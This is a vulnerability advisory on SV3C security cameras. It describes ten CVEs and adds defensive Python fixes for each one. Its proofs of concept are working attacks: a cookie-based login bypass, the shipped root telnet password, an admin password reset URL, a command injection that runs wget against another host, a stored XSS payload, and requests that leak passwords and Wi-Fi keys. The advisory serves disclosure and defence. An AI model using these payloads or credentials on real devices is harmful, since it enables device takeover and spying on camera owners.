Product Description
SV3C is a Chinese reseller of home and small business security cameras. The company’s official website is www.sv3c.com. The latest version of the application is V2.3.4.2103-S50-NTD-B20170823B, released on August 23, 2017.
Vulnerabilities List
A total of 10 vulnerabilities were identified within the SV3C Camera:
- Improper Session Management
- Improper Authentication
- Use of Hard-coded Passwords
- Improper Authorization
- OS Command Injection
- Password Exposure
- Stored Cross-site Scripting
- Information Disclosure
- Cleartext Transmission of Sensitive Information
- Open Redirect
These vulnerabilities are described in the following sections.
Affected Versions
Version: V2.3.4.2103-S50-NTD-B20170508B
Version: V2.3.4.2103-S50-NTD-B20170823B
Solution
No fix has been released yet.
VULNERABILITIES
Improper Session Management
The SV3C HD Camera is affected by an improper session management vulnerability that allows the camera login page to be bypassed. This vulnerability could be used to log in to the application without knowing the username and password set by the administrative user. The vulnerability affects version V2.3.4.2103-S50-NTD-B20170508B.
Vulnerability Details
CVE ID: CVE-2018-12666
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-228
CVSS Base Score: 9.8
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The SV3C Camera is vulnerable to improper session management due to a lack of proper session token generation. Users are identified only by the authentication level sent in the cookies. When the cookie was set with the name authLevel and the value 255 as shown below, the application allowed the user administrative access to the web application.
Cookie: language=en-US; authLevel=255
By setting the authLevel cookie, it is possible to bypass the login page and access all functionality within the application with the privilege level of 255, which is equivalent to an admin.
Improper Authentication
The SV3C HD Camera is affected by an improper authentication vulnerability that allows requests to be made to back-end CGI scripts without a valid session. This vulnerability could be used to read and modify the SV3C Camera configuration. The vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12667
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-287
CVSS Base Score: 9.8
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The SV3C Camera is vulnerable to improper authentication due to improper access checks. When expected requests were submitted to the application without any session cookies, no checks were performed and the application accepted the request as valid, as shown below:
POST /web/cgi-bin/hi3510/param.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/time...
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1

cmd=setntp&cururl=http%3A%2F%2F192.168.99.124%2Fweb%2Ftime.html&-ntpserver=time.nist.go&-ntpinterval=2&cmd=setservertime&-timezone=Asia%2FHong_Kong&-dstmode=off&-autoupdate=1&-autoupdatetzonvif=1
Figure 1 - Request without cookies to update time settings
The response to this request is shown below:
HTTP/1.0 200 OK
Content-Type:text/html

<html><head><title></title>
<META http-equiv="Content-Type" content="text/html; charset=gb2312">
<META http-equiv="Refresh" content="0;URL=http://192.168.99.124/web/time.html"></head><body></body></html>
Figure 2 - 200 OK response from the application
It is then possible to confirm within the application that the settings have been updated, as shown below:
Figure 3 - Time zone modified in the device configuration
This means that the camera does not do any kind of privilege checking and does not have any proper authentication or authorization checks in place.
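The two findings above share one root cause: the camera never maps a request back to a server-side session, so a client-chosen authLevel cookie (or no cookie at all) is taken at face value. The following Python sketch, added here as an illustration and not code from SV3C's firmware or from the advisory, shows the shape of a fix: an opaque random token issued at login, looked up server-side on every CGI request, and a per-command minimum privilege enforced before any command runs. The session table, the 900-second lifetime and the command-to-privilege mapping are assumptions chosen for the example; the commands listed are the ones this advisory names.

```python
import secrets
import time
from http.cookies import CookieError, SimpleCookie

ADMIN_LEVEL = 255
SESSION_TTL = 900  # seconds a token stays valid (assumption for the example)

# Constructed server-side session table: opaque token -> (username, level, expiry).
# The client only ever holds the token; the privilege level lives here, never in a cookie.
SESSIONS = {}


def create_session(username, auth_level):
    """Issue a random, unguessable token after a successful login."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = (username, auth_level, time.time() + SESSION_TTL)
    return token


def session_from_cookie(cookie_header):
    """Look up the 'session' cookie server-side; return (username, level) or None.

    A client-supplied authLevel cookie is never consulted: it is untrusted input.
    """
    if not cookie_header:
        return None
    jar = SimpleCookie()
    try:
        jar.load(cookie_header)
    except CookieError:
        return None
    if "session" not in jar:
        return None
    token = jar["session"].value
    entry = SESSIONS.get(token)
    if entry is None:
        return None
    username, level, expiry = entry
    if time.time() > expiry:
        SESSIONS.pop(token, None)
        return None
    return username, level


# Minimum privilege level per command. Constructed for the commands the advisory
# names; the real firmware's command table is not known to us.
COMMAND_MIN_LEVEL = {
    "getserverinfo": 3,
    "setntp": ADMIN_LEVEL,
    "setservertime": ADMIN_LEVEL,
    "updateuser": ADMIN_LEVEL,
}


def handle_param_cgi(cookie_header, cmd):
    """Gate for /web/cgi-bin/hi3510/param.cgi. Returns the HTTP status to send."""
    required = COMMAND_MIN_LEVEL.get(cmd)
    if required is None:
        return 404
    session = session_from_cookie(cookie_header)
    if session is None:
        return 401  # no valid session: reject before touching any command
    _, level = session
    if level < required:
        return 403  # authenticated, but not privileged enough for this command
    return 200


if __name__ == "__main__":
    # Both forged requests from the advisory are rejected; an issued token is accepted.
    print(handle_param_cgi("", "setntp"))                                  # 401
    print(handle_param_cgi("language=en-US; authLevel=255", "setntp"))     # 401
    token = create_session("admin", ADMIN_LEVEL)
    print(handle_param_cgi("language=en-US; session=" + token, "setntp"))  # 200
```

The important property is that the only value the client holds is random and meaningless on its own; forging it requires guessing 256 bits, and replaying it is bounded by the expiry. A request with no Cookie header at all, which the camera currently accepts, fails at the 401 step before any command handler is reached.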
Use of Hard-coded Passwords
The SV3C HD Camera is shipped with a root password that can be brute-forced. This password was also found to be documented online via external sources. The password could be used to log in to the exposed telnet service to gain root privileges on the affected devices.
This vulnerability exists on V2.3.4.2103-S50-NTD-B20170508B. The latest version of the software, V2.3.4.2103-S50-NTD-B20170823B, includes a root account with the same password, but the telnet port has been closed.
Vulnerability Details
CVE ID: CVE-2018-12668
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-259
CVSS Base Score: 9.8
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The password used as the root login account is easily brute-forced as its complexity is weak. Additionally, the password can be found in publicly disclosed password databases such as RockYou. A successful login is shown below:
$ nc 192.168.99.124 23
RT-IPC login: root root
Password: cat1029
Welcome to SONIX.
root@RT-IPC:~$
Figure 4 - Root login to SV3C HD Camera
The password used, cat1029, is shipped on all SV3C HD Cameras. The credentials root:cat1029 can be used to log in to the exposed telnet service.
Improper Authorization
The SV3C camera is vulnerable to improper authorization due to its lack of enforced vertical and horizontal access controls. An attacker with remote access to the SV3C HD Camera web interface can change passwords set within the camera by sending a change password request to the endpoint. This vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12669
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-285
CVSS Base Score: 8.8
CVSS Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
All accounts set within the SV3C HD Camera web interface can be reset by directly sending an updated password request to the web endpoint, as shown below:
http://192.168.99.124/web/cgi-bin/hi3510/param.cgi?cmd=updateuser&user0=admin:secretpass:255:Admin
Figure 5 - updateuser function called on the web application
The above proof of concept will update the username user0 to admin and the password to secretpass. The privilege level will then be set to 255, the highest privilege possible. This attack can be performed by any user.
OS Command Injection
The SV3C HD Camera does not perform validation checks on user inputs and is vulnerable through the ping function, within the web interface, to OS command injection. This vulnerability can be used to run arbitrary commands on the affected system. The vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12670
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-78
CVSS Base Score: 9.8
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
An attacker could use a crafted URL to inject commands and run them on the system. A proof of concept of this vulnerability is shown below:
http://192.168.99.124/cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=google.com%60%[command]%60&-time=%221525805499982%22
http://192.168.99.124/cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=google.com%60%20wget%20192.168.99.123%60&-time=%221525805499982%22
Figure 6 - Command injection payload
The above command performs the ping test against google.com, then runs the wget command against the IP 192.168.99.123. Other commands can be issued but are limited due to the use of BusyBox on the camera.
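The injection works because the -url value reaches a shell as part of a command string, so backticks in it become a second command. The following Python example, added here for illustration and not taken from the camera firmware or the advisory, shows a hardened ping handler: the target is validated against a hostname/IP grammar that admits no shell metacharacters, and the command is executed as an argument vector with no shell involved. The argv layout and the 4-packet count are assumptions for the example.

```python
import ipaddress
import re
import subprocess

# One DNS label: 1-63 letters, digits or hyphens, not starting or ending with a hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_target(value):
    """Accept a literal IPv4/IPv6 address or a syntactically valid hostname.

    Backticks, '$(', ';', spaces and every other shell metacharacter fail the
    label pattern, so the advisory's payload is rejected at this step.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def vulnerable_command_line(url):
    """The pattern the advisory describes: untrusted -url pasted into a shell
    string, so `...` inside the value runs as a second command. Never executed here."""
    return "ping -c 4 " + url


def build_ping_argv(url, count=4):
    """Hardened form: validate first, then pass the value as a single argv element."""
    if not is_valid_target(url):
        raise ValueError("refusing ping target: not a hostname or IP address")
    return ["ping", "-c", str(int(count)), url]


def run_ping(url):
    """Execute with shell=False (the default), so nothing re-parses argv."""
    argv = build_ping_argv(url)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return result.returncode


if __name__ == "__main__":
    # Constructed inputs: the advisory's injected value and a benign one.
    injected = "google.com` wget 192.168.99.123`"
    print(is_valid_target("google.com"), is_valid_target(injected))  # True False
    print(vulnerable_command_line(injected))  # shows the string the old code would hand to sh
    print(build_ping_argv("google.com"))      # ['ping', '-c', '4', 'google.com']
```

Both layers matter: the allow-list validation stops the payload before it exists, and the argv-based execution means that even a validation gap cannot turn a value into a command, because execve receives the target as one opaque argument.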
Password Exposure
An attacker with remote access to the SV3C HD Camera web interface can disclose information about the camera including all passwords set within the camera. This information can then be used to gain access to the web interface. This vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12671
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-200
CVSS Base Score: 7.5
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An attacker with access to the camera could disclose information about the camera and its network by submitting requests to endpoints used within the web application.
The following request can be used to gain access to the set usernames and passwords:
GET /web/cgi-bin/hi3510/param.cgi?cmd=getuser HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.122/web/user...
Connection: close
Figure 7 - Request that reveals usernames and passwords
The response to the above request is shown below:
HTTP/1.0 200 OK
Content-Type:text/html

var name0="admin"; var password0="wasdaf"; var authLevel0="255";
var name1="guest"; var password1="guest"; var authLevel1="3";
var name2="wafda"; var password2="secret"; var authLevel2="3";
var name3=""; var password3=""; var authLevel3="3";
var name4=""; var password4=""; var authLevel4="3";
var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3";
var name7=""; var password7=""; var authLevel7="3";
var name8=""; var password8=""; var authLevel8="0";
var name9=""; var password9=""; var authLevel9="0";
Figure 8 - Disclosed usernames and passwords
This request discloses all usernames, passwords, and authentication levels that specify if an account is a user or admin.
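The hard-coded root password, the unauthenticated updateuser call and the getuser response that returns cleartext passwords all point at the same missing component: a credential store that enforces a password policy, hashes what it keeps, checks who is asking before changing an account, and never hands secrets back. The Python class below is an added illustration of such a store; it is not code from SV3C or from the advisory. The 12-character minimum, the PBKDF2 parameters and the small breached-password list are assumptions standing in for a real policy and a real list such as RockYou.

```python
import hashlib
import hmac
import os

ADMIN_LEVEL = 255
USER_LEVEL = 3
PBKDF2_ROUNDS = 100_000

# Constructed stand-in for a breached-password list such as RockYou; a device
# would ship a much larger list or query a k-anonymity hash-prefix service.
BREACHED_PASSWORDS = {"password", "123456", "admin", "guest", "cat1029"}


def password_policy_error(password):
    """Return a reason string if the password is unacceptable, else None."""
    if len(password) < 12:
        return "password must be at least 12 characters"
    if password.lower() in BREACHED_PASSWORDS:
        return "password appears in a breached-password list"
    return None


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the salt is stored beside the hash, never reused."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


class UserStore:
    """Credential store that never holds or returns a cleartext password."""

    def __init__(self):
        self._users = {}  # username -> {"salt": bytes, "hash": bytes, "level": int}

    def add_user(self, username, password, level):
        err = password_policy_error(password)
        if err:
            raise ValueError(err)
        salt, digest = hash_password(password)
        self._users[username] = {"salt": salt, "hash": digest, "level": level}

    def verify(self, username, password):
        rec = self._users.get(username)
        if rec is None:
            hash_password(password)  # spend the same time for unknown users
            return False
        _, digest = hash_password(password, rec["salt"])
        return hmac.compare_digest(digest, rec["hash"])

    def update_user(self, actor, target, new_password, new_level=None):
        """Hardened 'updateuser'. Returns an HTTP status code.

        Vertical control: only an admin may touch other accounts or privilege levels.
        Horizontal control: a non-admin may change only its own password.
        """
        actor_rec = self._users.get(actor)
        if actor_rec is None:
            return 401
        is_admin = actor_rec["level"] >= ADMIN_LEVEL
        if not is_admin and (actor != target or new_level is not None):
            return 403
        if target not in self._users:
            return 404
        if password_policy_error(new_password):
            return 400
        salt, digest = hash_password(new_password)
        self._users[target]["salt"] = salt
        self._users[target]["hash"] = digest
        if new_level is not None:
            self._users[target]["level"] = new_level
        return 200

    def list_users(self):
        """Hardened 'getuser': names and levels only; no secret ever leaves the store."""
        return {name: rec["level"] for name, rec in self._users.items()}
```

With this layout a getuser-style endpoint has nothing secret to leak even if it is reached without authentication, a guest account cannot promote itself or reset admin, and a factory default such as cat1029 would be refused by the policy check before it could ever be set.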
Stored Cross-site Scripting
The SV3C HD Camera does not perform proper validation on user-supplied input and is vulnerable to cross-site scripting attacks. If proper authorization was implemented, this vulnerability could be leveraged to perform actions on behalf of another user or the administrator. The vulnerability affects version V2.3.4.2103-S50-NTD-B20170508B, which ships with the camera as default. It is unknown if the latest version is affected.
Vulnerability Details
CVE ID: CVE-2018-12672
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-79
CVSS Base Score: 7.1
CVSS Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
An attacker could use a crafted URL to insert a JavaScript payload that could be leveraged to execute scripts within another user’s browser. Below is a proof of concept:
http://192.168.99.124/web/cgi-bin/hi3510/param.cgi?cmd=showosdtime&cururl=http%3A%2F%2F192.168.99.124%2Fweb%2Fosd.html%23&cmd=setosdattr&-region=1&-x=66&-y=32&-ipcname=%253Cscript%2520type%253D%2527text%252Fjavascript%27%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&-encode=&cmd=setservername&-ipcname=asdf&-encode=
Figure 9 - XSS payload
This proof of concept will insert a script into the camera name. When the name is loaded within the web interface (i.e., on the page found at Media > OSD), then the script is executed and an alert box pops up within the user’s browser, as shown below:
Figure 10 - JavaScript payload executed within the browser
A user who loads this page will load the script, which could perform malicious actions against the camera under the logged-in user’s account.
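The payload in Figure 9 is URL-encoded twice, so the first decode performed by the CGI leaves a still-encoded string that passes through storage and is only turned into live markup when the OSD page decodes and inserts it. The Python example below is added here to illustrate that path and the two-sided fix (an input allow-list for the camera name, and HTML escaping at the point of output); it is not code from the camera or from the advisory. The sample query string is constructed from the advisory's -ipcname value alone, and the 32-character name alphabet is an assumption.

```python
import html
import re
from urllib.parse import parse_qs, unquote

# Constructed query string: the -ipcname value is the double-encoded payload
# quoted in the advisory, isolated from the rest of its request.
SAMPLE_QUERY = (
    "cmd=setosdattr&-region=1&-x=66&-y=32&-ipcname="
    "%253Cscript%2520type%253D%2527text%252Fjavascript%27%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
)

# Camera names are short display strings; this allow-list is an assumption.
_NAME_OK = re.compile(r"^[A-Za-z0-9 _.-]{1,32}$")


def extract_ipcname(query_string):
    """Recover the camera name as it ends up after both decoding layers.

    parse_qs removes one layer of %-encoding; the payload carries a second, which
    is why it survives the first decode and becomes markup only when rendered.
    """
    once = parse_qs(query_string, keep_blank_values=True).get("-ipcname", [""])[0]
    return unquote(once)


def validate_ipcname(name):
    """Input-side defence: accept only a plain display-name alphabet."""
    return bool(_NAME_OK.match(name))


def render_osd_name_vulnerable(name):
    """What the OSD view evidently does today: stored value inserted verbatim."""
    return '<span id="ipcname">' + name + "</span>"


def render_osd_name(name):
    """Output-side defence: HTML-escape at the point of insertion, every time."""
    return '<span id="ipcname">' + html.escape(name, quote=True) + "</span>"


if __name__ == "__main__":
    stored = extract_ipcname(SAMPLE_QUERY)
    print(stored)                         # <script type='text/javascript'>alert('xss');</script>
    print(validate_ipcname(stored))       # False
    print(render_osd_name(stored))        # &lt;script ... &gt; rendered as text, not executed
```

Escaping on output is the control that holds regardless of how the value got into storage; the input allow-list is defence in depth that also keeps the name from breaking the on-screen overlay.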
Information Disclosure
An attacker with remote access to the SV3C HD Camera web interface can disclose information about the camera including camera hardware, wireless network, and local area network information. This vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12673
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-200
CVSS Base Score: 7.5
CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
An attacker with access to the camera could disclose information about the camera and the network it is on by submitting requests to endpoints used within the web application.
The following request can be used to gain access to information about the camera:
GET /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo&-encode HTTP/1.1
Host: 192.168.99.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.122/web/vide...
X-Requested-With: XMLHttpRequest
Connection: close
Figure 11 - Request for camera information
The response to the above request is shown below:
HTTP/1.0 200 OK
Content-Type:text/html

var serialNum="VVVIPCNTD171205Z-17480IKDSPbcQQs";
var model="RT_IPC";
var hardVersion="8700-sc2135";
var softVersion="V2.3.4.2103-S50-NTD-B20170508B";
var ipcname="IPCAM";
var startdate="2000-1-1 0:0:0";
var runtimes="0 day, 0:11";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="May 8 2017 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";
Figure 12 - Response returning information about the camera and hardware
The following request can be used to gain information about the wireless network if the camera is Wi-Fi enabled and in use:
GET /cgi-bin/getwifiattr.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/inde...
Connection: close
Figure 13 - Request for wireless network information
The following response is returned:
HTTP/1.0 200 OK
Content-Type:text/plain

var wifissid = "TEST-WIFI";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="TEST-WIFI";
var wifienable="-1";
var wifimac="";
var wifienable="-1";
var linkstatus="0";
var linkssid="";
var wifimode="";
Figure 14 - Wireless information returned
The following request can be used to gain access to information about the local area network:
GET /cgi-bin/getinetattr.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/netw...
Connection: close
Figure 15 - Request for LAN information
Below is the response to the above request:
HTTP/1.0 200 OK
Content-Type:text/plain

var networktype = "LAN" ;
var ip = "192.168.99.124" ;
var netmask = "255.255.255.0" ;
var gateway = "192.168.99.1" ;
var macaddress = "C0:99:D9:AC:62:18" ;
var dhcpflag = "off" ;
var dnsstat = "1" ;
var fdnsip = "192.168.99.1" ;
var sdnsip = "8.8.8.8" ;
Figure 16 - LAN information returned
These requests can be used to gain additional information about the camera and its environment.
Cleartext Transmission of Sensitive Information
The SV3C HD Camera stores the username and password within the cookies of a session. If an attacker gained access to these session cookies, it would be possible to gain access to the username and password of the logged-in account. This vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12674
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-319
CVSS Base Score: 5.7
CVSS Vector: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
The SV3C HD Camera discloses the username and password via the cookies found in the session of the camera. By copying out and decoding the Base64 strings, it is possible to view the username and password of the account, as shown below:
Cookie: language=en-US; username=YWRtaW4%3D; password=d2FzZGFm; authLevel=255
The above strings, YWRtaW4%3D and d2FzZGFm, are Base64 encoded and can be decoded to the following:
YWRtaW4= -> admin
d2FzZGFm -> wasdaf
Decoding the strings reveals the username and password of the session in use.
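Base64 is an encoding, not encryption, so a cookie built this way carries the credentials in the clear on every request (and the camera serves its interface over plain HTTP). The Python example below is added to illustrate two things and is not code from SV3C or from the advisory: an audit routine that flags credential-bearing cookies in a captured Cookie header, which is a useful check to run against any embedded web interface, and the shape of a replacement Set-Cookie that carries only an opaque token with HttpOnly, SameSite and Secure set. The cookie-name list is an assumption; the sample header is the one quoted above.

```python
import base64
import binascii
import secrets
from urllib.parse import unquote

# Cookie names that should never appear at all; assumption for the audit.
CREDENTIAL_COOKIE_NAMES = {"username", "password", "user", "pass", "pwd"}


def parse_cookie_header(header):
    """Split a raw 'Cookie:' header (with or without the field name) into a dict."""
    if header.lower().startswith("cookie:"):
        header = header[len("cookie:"):]
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name] = unquote(value)  # %3D -> '=' and similar
    return pairs


def try_base64(value):
    """Return the decoded text if value is valid Base64 of UTF-8, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None


def audit_cookie_header(header):
    """Report {cookie_name: cleartext} for every credential-bearing cookie."""
    findings = {}
    for name, value in parse_cookie_header(header).items():
        if name.lower() in CREDENTIAL_COOKIE_NAMES:
            decoded = try_base64(value)
            findings[name] = decoded if decoded is not None else value
    return findings


def issue_session_cookie(secure=True):
    """Hardened alternative: an opaque token, never the credentials, with the
    attributes that keep it off plaintext HTTP and out of reach of page scripts."""
    token = secrets.token_urlsafe(32)
    attrs = ["session=" + token, "Path=/", "HttpOnly", "SameSite=Strict"]
    if secure:
        attrs.append("Secure")
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    # The header quoted in the advisory, as captured from the camera.
    sample = "Cookie: language=en-US; username=YWRtaW4%3D; password=d2FzZGFm; authLevel=255"
    print(audit_cookie_header(sample))  # {'username': 'admin', 'password': 'wasdaf'}
    print(issue_session_cookie())
```

The Secure attribute only helps once the interface is served over TLS, which this camera does not do; until then the opaque token is still exposed on the wire, but it is short-lived and revocable, whereas a leaked password is neither.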
Open Redirect
The SV3C HD Camera does not perform origin checks on URLs that the camera’s web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint. This vulnerability affects all versions.
Vulnerability Details
CVE ID: CVE-2018-12675
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-601
CVSS Base Score: 4.3
CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
A crafted link can be used to send a user to an unexpected endpoint. The following proof of concept will redirect a user to the Bishop Fox website:
http://192.168.99.124/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fbishopfox.com
Figure 17 - Open redirect payload
This vulnerability can be used along with phishing campaigns and other vulnerabilities to further exploit a user.
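The cururl parameter is used throughout the interface to send the browser back to the page it came from, so the fix is a single validation function applied wherever a redirect target is read. The Python function below is added as an illustration and is not code from the camera or the advisory: it accepts only a local path under the web UI, or an absolute http(s) URL whose host is the device itself (reduced to its path), and falls back to a fixed default page for anything else. The device address, the /web/ prefix and the default page are assumptions for the example.

```python
from urllib.parse import urlsplit

# Constructed: the addresses the camera answers on, and where to land otherwise.
DEVICE_HOSTS = {"192.168.99.124"}
DEFAULT_PAGE = "/web/index.html"
ALLOWED_PREFIX = "/web/"  # assumption: the user interface lives under /web/


def safe_redirect_target(cururl, device_hosts=DEVICE_HOSTS):
    """Return a local path the camera may redirect to, or DEFAULT_PAGE.

    Accepted: a path under ALLOWED_PREFIX, or an absolute http(s) URL whose host
    is this device. Refused: other hosts, scheme-relative URLs (//host/...),
    non-http schemes such as javascript:, backslashes and parent traversal.
    """
    if not cururl:
        return DEFAULT_PAGE
    parts = urlsplit(cururl)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: must be http(s) and point at this device.
        if parts.scheme not in ("http", "https") or parts.hostname not in device_hosts:
            return DEFAULT_PAGE
    path = parts.path
    if not path.startswith(ALLOWED_PREFIX) or "\\" in path or ".." in path:
        return DEFAULT_PAGE
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    # The advisory's target and a legitimate one, after CGI %-decoding.
    print(safe_redirect_target("http://bishopfox.com"))                  # /web/index.html
    print(safe_redirect_target("http://192.168.99.124/web/time.html"))   # /web/time.html
    print(safe_redirect_target("/web/osd.html#"))                        # /web/osd.html
```

Returning a path rather than echoing the original string means the Location header the camera emits can never name a foreign host, whatever the caller supplied.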
Disclosure Timeline
- Initial discovery: 4/16/2018
- Vendor contacted: 6/18/2018
- Response from vendor: 6/27/2018
- Report sent: 7/3/2018
- Vulnerability status requested, no response: 7/22/2018
- Vulnerability status requested, no response: 8/20/2018
Researcher
Jefferino Siqueria, Security Analyst at Bishop Fox